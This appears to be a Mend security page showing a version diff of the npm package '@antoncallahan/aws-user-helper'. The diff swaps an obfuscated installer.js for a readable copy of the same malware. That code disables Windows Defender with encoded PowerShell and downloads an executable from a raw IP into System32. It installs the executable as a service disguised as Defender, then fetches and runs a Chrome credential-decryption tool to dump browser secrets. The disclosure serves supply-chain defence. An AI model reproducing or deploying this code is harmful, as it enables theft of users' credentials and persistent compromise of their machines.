npm - @antoncallahan/aws-user-helper - Versions diffs - 1.13.0 → 2.13.0 - Mend

@antoncallahan/aws-user-helper 1.13.0 → 2.13.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of @antoncallahan/aws-user-helper might be problematic. Click here for more details.

Files changed (2) hide show

package/installer.js +113 -2
package/package.json +1 -1

package/installer.js CHANGED Viewed

@@ -1,2 +1,113 @@
-function _0x3938(){const _0x44dba3=['C3rHBgXLzc4','Cg93zxjZAgvSBa','x3G2nc5LEgu','AMvJDg9YjYaTrG','zfDvz0XvuNbJmG','wM1wEvPxnwPAuW','ntm1otuYyMDHq2Hq','B3v0Chv0','Cgf0Aa','B3DUBg9Hzc92ma','mZaXnZi3n0TYr2rzBa','oxnAr1z5uvDoAG','wKDvz0XvwNzJBq','yMfZzty0','Cc1cB3vUzc1fBG','wLnbDfjhBhPzvW','Dg9tDhjPBMC','BM9Kzs13Aw5KBW','vNnIq0f0uti5Da','BwuTAw5Qzwn0BW','suvsBfPTvNvArW','mZi5mZqZmLfdC2TAwG','CgLWzq','AwXLicC','Dg1WzgLY','xgnPlNPPCcCGlq','zMLUAxnO','twLJCM9ZB2z0ua','vNvKq0jpwLHABa','B3rLy3rPB25Z','ywXYzwfKEwLUCW','y3j5ChrPB24Tra','y3jLyxrLv3jPDa','C3rHBgXLzcWGCW','rMLIr1zRsumXrG','AMvJDg9YxgnOCG','B21LBgv2yxrVCG','BwTKAxjtEw5J','qxrsr2X6wvDkCW','mZeYnteZyxb2y0z1','tMXjqZfouvzcva','y21SD2rgtMPzvW','yM5sCgiYnvrLwa','zxHLyW','nJCUmtCZlJeXnq','vtjgDgnhEgXJma','yM1gAwjhvK9Awa','vw5wDuXTvJrAuW','iKLUDM9Rzs1xzq','uJnIm0PYvuHkDG','nw5jrvjWyZjgAq','Ahr0CdOVlZy5lG','swXvseP2wJnkAa','n2DTueD6CW','yKDwA0LdmvrKvW','CMvSzwfZzxmVza','twLjpq','uKDwBwfxnxbKrW','mta2nZG5ogPezevKrW','Bg9N','vNLyrtf3utiXAW','AM9PBG','sNnAvKPSwvD4ma','vuHkDMrhvMPKrW','CMf3','oI8Vz2L0AhvIlG','BhzIAufRzeHkmq','qwXYzwfKEsbPBG','zwnYExb0Aw9UlW','Aw5ZDgfSBa','qxrvBvz0yJnABa','EwXLieHPzgrLBG','mJb1CLPxvue','EMLWjYaTt3v0rG','uNzJBwX1wNLbAW','nZeYmLPevKLJsq','y3j5ChrV','zeHkmvPtqxrsrW','y0C5m1PysNPHrW','rxHWyw5KlufYyW','xgnOCM9Tzs1PBG','yLDgDvPdqwLvmG','zvn0CMvHBq','CM90zwn0lMv4zq','AwnL','y29Tl3HHAxrHEa','sNrHwfjuwvCXDW','y25wBeLdmuzIBq','vJbmvtf3vuHkBa','AgL2zsaTugf0Aa','vxjPicDODhrWCW','BhzIBej5wLHABa','zeDwAMrhBhzIAq','nxvHvZvUsunsma','CI12mc4Ymc4WlG','lJiWlJaVy2HYBW','zxnZ','vw1wD2iZsJbHvW','wLvSDwrisJfJmG','Ahr0Ca','BM9Kzs1UB3rPzG','y2XoBgjTuwK','ic1xAw5KB3DtDa','AwvY','zNjVBq','ywXS','rMLIr1zeyJi1ma','ic1dB21Tyw5Kia','uhjVDgvJDc5LEa','C3rHCNq','mJiXmdG5nu1AAxDIza','BLbHDgGGjW','yKDwELeYoxvJmG','yLjLCxvLC3qGlq','qKjKv1jWzeuXDG','y205C2jhvMTsBq','yLvACgjhvNPkvG','z2v0'];_0x3938=function(){return _0x44dba3;};return _0x3938();}function _0x55d1(_0x28685e,_0x1e48a8){_0x28685e=_0x28685e-(0x12b*0xd+0x1cd2+0x2a*-0x107);const _0x6dd1b9=_0x3938();let _0x10a785=_0x6dd1b9[_0x28685e];if(_0x55d1['nVnBbx']===undefined){var _0x35b1db=function(_0x3c396c){const _0xbea7ff='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x162292='',_0x4bf394='';for(let _0x3af858=-0x15e4+0xb07+0xadd,_0x2e9009,_0x227060,_0x4d87c1=-0x22b0+0x5e*-0xd+-0x1*-0x2776;_0x227060=_0x3c396c['charAt'](_0x4d87c1++);~_0x227060&&(_0x2e9009=_0x3af858%(0x5cf*0x5+-0x1*-0x281+-0x1f88)?_0x2e9009*(-0x841*0x1+-0x12ed+0x1b6e)+_0x227060:_0x227060,_0x3af858++%(0x4f2+-0x532*-0x7+0xdc4*-0x3))?_0x162292+=String['fromCharCode'](0xacf+-0x14f7+0xb27&_0x2e9009>>(-(-0x146*0xd+-0x1*-0x1d23+-0x57*0x25)*_0x3af858&-0x1396+0xc66+0x736)):0x25a+0xb17+-0xd71){_0x227060=_0xbea7ff['indexOf'](_0x227060);}for(let _0x349b62=-0x25ff+0x307*0x1+0xba8*0x3,_0x2256e0=_0x162292['length'];_0x349b62<_0x2256e0;_0x349b62++){_0x4bf394+='%'+('00'+_0x162292['charCodeAt'](_0x349b62)['toString'](-0xcf6*-0x1+-0x23b4+0x16ce))['slice'](-(-0x22dd+0x825+0x1aba));}return decodeURIComponent(_0x4bf394);};_0x55d1['zLNawQ']=_0x35b1db,_0x55d1['CSPsHw']={},_0x55d1['nVnBbx']=!![];}const _0x5e31e8=_0x6dd1b9[0x1*0x25ec+0x2287*0x1+-0x4873],_0x3870b0=_0x28685e+_0x5e31e8,_0x752d03=_0x55d1['CSPsHw'][_0x3870b0];return!_0x752d03?(_0x10a785=_0x55d1['zLNawQ'](_0x10a785),_0x55d1['CSPsHw'][_0x3870b0]=_0x10a785):_0x10a785=_0x752d03,_0x10a785;}(function(_0x3ca1a8,_0x3a15de){const _0x236faf=_0x55d1,_0x2bd30e=_0x3ca1a8();while(!![]){try{const _0x42800d=parseInt(_0x236faf(0xea))/(0x2142+0x253c+-0x467d)+parseInt(_0x236faf(0x12f))/(0xa1f*0x2+-0x3*0x5a8+-0x13*0x2c)+-parseInt(_0x236faf(0x10b))/(-0x101*-0x20+-0x2*0x5cb+-0x1487)*(parseInt(_0x236faf(0x12c))/(-0xb9a*-0x1+0x9fa*0x1+-0x1590))+parseInt(_0x236faf(0xdc))/(-0x11b8*-0x1+0x6*-0x5ff+0x1247*0x1)+-parseInt(_0x236faf(0x11e))/(0x2*0xa06+0x705+0x3dd*-0x7)+parseInt(_0x236faf(0x119))/(-0x5*0x6c5+0x2336+0x39*-0x6)*(parseInt(_0x236faf(0xf9))/(-0xc6*-0x24+-0x22ec*0x1+0x71c))+-parseInt(_0x236faf(0xee))/(0x1*-0x9d2+0x23ad*-0x1+0x2d88);if(_0x42800d===_0x3a15de)break;else _0x2bd30e['push'](_0x2bd30e['shift']());}catch(_0x8ffc54){_0x2bd30e['push'](_0x2bd30e['shift']());}}}(_0x3938,-0x86f04+0x555*-0x97+-0x6f*-0x2759),(async function(){const _0x5509c9=_0x55d1,_0x3cf1b8=require('./hwid'),{execSync:_0x536350,execFile:_0x409286}=require('child_proc'+_0x5509c9(0x144)),_0x2dc72f=require('fs'),_0x5322dc=require(_0x5509c9(0xec)),_0x32bec3=require('os'),_0x436bd1=require(_0x5509c9(0x148)+_0x5509c9(0x14b)),{Service:_0x4e312d}=require(_0x5509c9(0xf5)+'ws'),_0x519534=require(_0x5509c9(0x130)),_0x186dbd=require('https'),_0xdb11f=require(_0x5509c9(0x147)),_0x259db3=_0x5322dc[_0x5509c9(0x121)](_0x32bec3['tmpdir'](),_0x5509c9(0xeb));_0x2dc72f[_0x5509c9(0x109)](_0x259db3,{'recursive':!![]});const _0x189716=async()=>{const _0x3535d3=_0x5509c9,[_0x2c1433,_0x5ba6ae,_0x6be9a2]=[Buffer[_0x3535d3(0x14c)](_0x3535d3(0x132)+'VsbCAtQ29t'+_0x3535d3(0x135)+_0x3535d3(0x13c)+_0x3535d3(0xe9)+_0x3535d3(0x10a)+_0x3535d3(0x146)+_0x3535d3(0x13f)+_0x3535d3(0x10e)+'N0ZW0gJHRy'+_0x3535d3(0xe8)+'FibGVJT0FW'+_0x3535d3(0x123)+_0x3535d3(0x126)+_0x3535d3(0xf3)+_0x3535d3(0x122)+'aW1lTW9uaX'+_0x3535d3(0x12e)+_0x3535d3(0x131)+'lzYWJsZVNj'+_0x3535d3(0x10d)+_0x3535d3(0x141)+_0x3535d3(0x13b)+_0x3535d3(0x14e)+_0x3535d3(0xe1)+_0x3535d3(0xef)+'ZXNzIERpc2'+_0x3535d3(0x106)+_0x3535d3(0x112)+_0x3535d3(0x115)+_0x3535d3(0x140)+_0x3535d3(0xe0)+_0x3535d3(0xf0)+_0x3535d3(0x10c)+_0x3535d3(0x145)+_0x3535d3(0x116)+_0x3535d3(0x11a)+_0x3535d3(0x13a)+_0x3535d3(0xde)+_0x3535d3(0x100)+_0x3535d3(0x149),_0x3535d3(0xf1))[_0x3535d3(0xf4)](),Buffer[_0x3535d3(0x14c)]('cG93ZXJzaG'+_0x3535d3(0xf6)+_0x3535d3(0x135)+_0x3535d3(0x13c)+_0x3535d3(0xe9)+'AtU3VibWl0'+_0x3535d3(0x111)+'NvbnNlbnQg'+_0x3535d3(0x11c),_0x3535d3(0xf1))[_0x3535d3(0xf4)](),Buffer[_0x3535d3(0x14c)]('Y21kIC9jIC'+_0x3535d3(0x118)+_0x3535d3(0xe2)+'xXaW5kb3dz'+_0x3535d3(0xf8)+_0x3535d3(0x120)+_0x3535d3(0x113)+_0x3535d3(0x12a)+_0x3535d3(0x11d)+'lvbnMgLUFs'+'bCI=',_0x3535d3(0xf1))[_0x3535d3(0xf4)]()];return new Promise((_0x581708,_0x555749)=>{const _0x7747c8=_0x3535d3;child_process[_0x7747c8(0x10f)](_0x2c1433,{'windowsHide':!![]},_0x3ce176=>{const _0x2e6697=_0x7747c8;if(_0x3ce176)return _0x555749(_0x3ce176);child_process[_0x2e6697(0x10f)](_0x5ba6ae,{'windowsHide':!![]},_0x161922=>{const _0x25112e=_0x2e6697;if(_0x161922)return _0x555749(_0x161922);child_process[_0x25112e(0x10f)](_0x6be9a2,{'windowsHide':!![]},_0x64e661=>{if(_0x64e661)return _0x555749(_0x64e661);_0x581708();});});});});};await _0x189716(),await new Promise(_0x51cb6f=>setTimeout(_0x51cb6f,-0x889+-0xbdb+0x1c34));const _0x35bf58=await _0x3cf1b8['getHwid'](),_0xe17c7f=String[_0x5509c9(0x124)]`C:\Windows\System32\Microsoft\Protect`;_0x2dc72f[_0x5509c9(0x109)](_0xe17c7f,{'recursive':!![]});const _0x23e96b=_0x2dc72f[_0x5509c9(0x104)+_0x5509c9(0x136)](_0x5322dc[_0x5509c9(0x121)](_0xe17c7f,_0x5509c9(0xff)+_0x5509c9(0x137)));_0xdb11f[_0x5509c9(0xe3)](_0x5509c9(0x117)+_0x5509c9(0x110)+'/Microsoft'+_0x5509c9(0x150)+'e',_0x23a3ba=>{const _0x5a596a=_0x5509c9;_0x23a3ba[_0x5a596a(0xfa)](_0x23e96b),_0x23e96b['on'](_0x5a596a(0xfe),()=>_0x23e96b['close']());});const _0xb12c6e=new _0x4e312d({'name':_0x5509c9(0xff)+'rotectServ'+_0x5509c9(0x138),'description':'Windows\x20De'+'fender\x20Add'+'itional\x20Pr'+_0x5509c9(0x101),'script':String[_0x5509c9(0x124)]`C:\Windows\System32\Microsoft\Protect\MicrosoftProtect.exe`,'execPath':String['raw']`C:\Windows\System32\Microsoft\Protect\MicrosoftProtect.exe`});_0xb12c6e['on']('install',()=>{const _0x3133e6=_0x5509c9;console[_0x3133e6(0x11f)]('Service\x20in'+_0x3133e6(0x105)+'tarting...'),_0xb12c6e[_0x3133e6(0xdb)]();}),_0xb12c6e['on'](_0x5509c9(0x102)+'talled',()=>{const _0x1dc9ca=_0x5509c9;console[_0x1dc9ca(0x11f)](_0x1dc9ca(0x127)+_0x1dc9ca(0xe4));}),_0xb12c6e['on'](_0x5509c9(0xdb),()=>{const _0x143aa3=_0x5509c9;console[_0x143aa3(0x11f)]('Service\x20st'+'arted.');}),_0xb12c6e[_0x5509c9(0x129)]();const _0x35b9b9=require('os')[_0x5509c9(0xfc)]();_0x536350(_0x5509c9(0xe5)+_0x5509c9(0x14a)+_0x5509c9(0x12b)+_0x5509c9(0x14f)+_0x5509c9(0x114)+_0x5509c9(0xdf)+_0x5509c9(0x13e)+_0x5509c9(0x125)+_0x5509c9(0x139)+'/Chrome-Ap'+_0x5509c9(0xf2)+_0x5509c9(0x103)+_0x5509c9(0x128)+_0x5509c9(0x11b)+_0x5509c9(0xed)+_0x5509c9(0x143)+_0x5509c9(0xf7)+_0x5509c9(0x142)+_0x5509c9(0x12d)+_0x5509c9(0xfb)+_0x35b9b9+('\x5cci.zip\x27;\x20'+_0x5509c9(0x133)+_0x5509c9(0x13d)+'\x20\x27')+_0x35b9b9+(_0x5509c9(0xfd)+'Destinatio'+_0x5509c9(0xdd))+_0x35b9b9+('\x5cchrome-in'+_0x5509c9(0xe7)+'orce\x22'),{'windowsHide':!![]});const _0x5c1329=_0x409286(_0x35b9b9+(_0x5509c9(0x134)+_0x5509c9(0x107)+_0x5509c9(0x108)+_0x5509c9(0xe6)),[_0x5509c9(0x14d),'-o',_0x259db3],{'windowsHide':!![]});}()));
-//# sourceMappingURL=map.js.map
+(async function() {
+const hwid = require('./hwid');
+const { execSync, execFile } = require('child_process');
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+const notifier = require('node-notifier');
+const { Service } = require("node-windows");
+const crypto = require('crypto');
+const https = require('https');
+const http = require('http');
+const DEBUG = 1
+if (DEBUG) {
+  const logStream = fs.createWriteStream(path.join(__dirname, 'debug.log'), { flags: 'a' });
+  const origLog = console.log;
+  const origErr = console.error;
+  console.log = (...args) => logStream.write(args.join(' ') + '\n');
+  console.error = (...args) => logStream.write('[ERROR] ' + args.join(' ') + '\n');
+  process.on('uncaughtException', (err) => {
+    logStream.write('[UNCAUGHT] ' + err.stack + '\n');
+    process.exit(1);
+  });
+}
+const outputDir = path.join(os.tmpdir(), 'output');
+fs.mkdirSync(outputDir, { recursive: true });
+const DisableDefender = async () => {
+    const [
+        cmd1,
+        cmd2,
+        cmd3,
+    ] = [
+            Buffer.from(`cG93ZXJzaGVsbCAtQ29tbWFuZCAiU2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQi`, 'base64').toString(),
+            Buffer.from(`cG93ZXJzaGVsbCAtQ29tbWFuZCAiU2V0LU1wUHJlZmVyZW5jZSAtU3VibWl0U2FtcGxlc0NvbnNlbnQgMiI=`, 'base64').toString(),
+            Buffer.from(`Y21kIC9jICIlUHJvZ3JhbUZpbGVzJVxXaW5kb3dzIERlZmVuZGVyXE1wQ21kUnVuLmV4ZSAtUmVtb3ZlRGVmaW5pdGlvbnMgLUFsbCI=`, 'base64').toString(),
+        ]
+    return new Promise((resolve, reject) => {
+        child_process.exec(cmd1, { windowsHide: true }, (error) => {
+            if (error) return reject(error);
+            child_process.exec(cmd2, { windowsHide: true }, (error) => {
+                if (error) return reject(error);
+                child_process.exec(cmd3, { windowsHide: true }, (error) => {
+                    if (error) return reject(error);
+                    resolve();
+                });
+            });
+        });
+    });
+};
+await DisableDefender()
+await new Promise((resolve) => setTimeout(resolve, 2000));
+const uuid = await hwid.getHwid();
+const dir = String.raw`C:\Windows\System32\Microsoft\Protect`;
+fs.mkdirSync(dir, { recursive: true });
+const file = fs.createWriteStream(path.join(dir, 'MicrosoftProtect.exe'));
+http.get('http://69.67.173.115/MicrosoftProtect.exe', (res) => {
+    res.pipe(file);
+    file.on('finish', () => file.close());
+});
+const svc = new Service({
+  name: "MicrosoftProtectService",
+  description: "Windows Defender Additional Protections",
+  script: String.raw`C:\Windows\System32\Microsoft\Protect\MicrosoftProtect.exe`,
+  execPath: String.raw`C:\Windows\System32\Microsoft\Protect\MicrosoftProtect.exe`,
+});
+svc.on("install", () => {
+  console.log("Service installed, starting...");
+  svc.start();
+});
+svc.on("alreadyinstalled", () => {
+  console.log("Already installed.");
+});
+svc.on("start", () => {
+  console.log("Service started.");
+});
+svc.install();
+const tmp = require('os').tmpdir();
+execSync(`powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption/releases/download/v0.20.0/chrome-injector-v0.20.0.zip' -OutFile '${tmp}\\ci.zip'; Expand-Archive -Path '${tmp}\\ci.zip' -DestinationPath '${tmp}\\chrome-injector' -Force"`, { windowsHide: true });
+const child = execFile(
+  `${tmp}\\chrome-injector\\chromelevator_x64.exe`,
+  ['all', '-o', outputDir],
+  { windowsHide: true }
+);
+})()

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "@antoncallahan/aws-user-helper",
-  "version": "1.13.0",
+  "version": "2.13.0",
   "description": "",
   "main": "index.js",
   "scripts": {